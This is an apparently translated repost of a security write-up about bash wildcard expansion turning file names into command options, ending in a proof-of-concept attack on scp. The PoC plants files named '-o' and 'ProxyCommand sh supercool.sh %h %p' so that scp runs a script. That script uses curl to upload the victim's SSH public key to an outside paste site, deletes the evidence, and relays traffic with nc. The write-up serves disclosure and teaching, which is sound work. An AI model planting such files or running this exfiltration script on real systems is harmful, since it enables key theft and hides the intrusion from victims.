The little crab who loves the little fox
from:https://dicesoft.net/projects/wildcard-code-execution-exploit.htm
0 x00 wildcard
When you type “*” on a bash command line, bash extends to all files in the current directory, and then passes them all to the program as arguments. For example, rm * deletes all files in the current directory.
0x01 File name is taken as an argument
Most command-line programs are affected by this. For example, when no arguments are applied to the ls command, the output looks like this:
#! bash [[email protected] foo]$ ls
asdf.txt foobar -l
Copy the codeIf you want to know which groups and users these files belong to, you can use the “-l” argument to check:
#! bash [[email protected] foo]$ ls -l
total 0
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 -l
Copy the codeNotice that there is a file named “-l”, let’s try “ls *” to see what happens.
#! bash [[email protected] foo]$ ls *
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar
Copy the codeUnlike before, “ls * “does not output the -l file, the -l file is used as an argument to this command.
This command is equivalent to running:
#! bash [[email protected] foo]$ ls asdf.txt foobar -l
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar
Copy the code0x02 Security Problem
This problem can cause security problems when someone has a wildcard in the argument and doesn’t check the file name in the directory first. This could be used to attack someone’s computer.
This problem is well known at seclists.org/fulldisclos… There have been discussions about this.
0x03 Proof of Concept Exploit
To prove that this problem can be translated into an arbitrary code execution attack, we try to attack the “SCP” command, which provides the -o option to configure SSH, SSH has the option to run commands, we can take advantage of this and let our script run.
Suppose we have control over a directory where the victim will run the following command (imagine that the user just downloads the source code of a Web application and uploads it to their web server) :
#! bash $ scp *[email protected]:/var/www/
Copy the codeTo use this command, we need to place several files in the directory:
"-o" -SCP will take this file as the "-o" parameter. "ProxyCommand sh supercool.sh %h %p" -scp will treat this file as an argument to "-o". "Supercool. sh" - This script will be executed. "Zzz.txt" - useless test file.Copy the codeIn the supercool.sh file, there are some malicious commands:
#! bash #! /bin/sh # Upload their SSH public key to the Internet, and put a scary message in /tmp/. echo "By @DefuseSec and @redragonx..." > /tmp/you-have-been-hacked.txt echo "This could have been your private key..." >> /tmp/you-have-been-hacked.txt curl -s -d "jscrypt=no" -d "lifetime=864000" \ -d "shorturl=yes" --data-urlencode "paste@$HOME/.ssh/id_rsa.pub" \ https://defuse.ca/bin/add.php -D - | \ grep Location | cut -d " " -f 2 >> /tmp/you-have-been-hacked.txt # Delete evidence of our attack. rm ./-o ProxyCommand\ sh\ supercool.sh\ %h\ %p echo > ./supercool.sh # Do what ProxyCommand is supposed to do. nc -p 22332 -w 5 $1 $2Copy the codeWhen the victim carries out a command:
#! bash $ scp *[email protected]:/var/www/
supercool.sh
zzz.txt
Copy the codeWhen he checks his/TMP directory he will see:
#! bash $ cat /tmp/you-have-been-hacked.txt By @DefuseSec and @redragonx... This could have been your private key... https://defuse.ca/b/QQ3nxADuCopy the codeThe full POC file can be downloaded here: poc.zip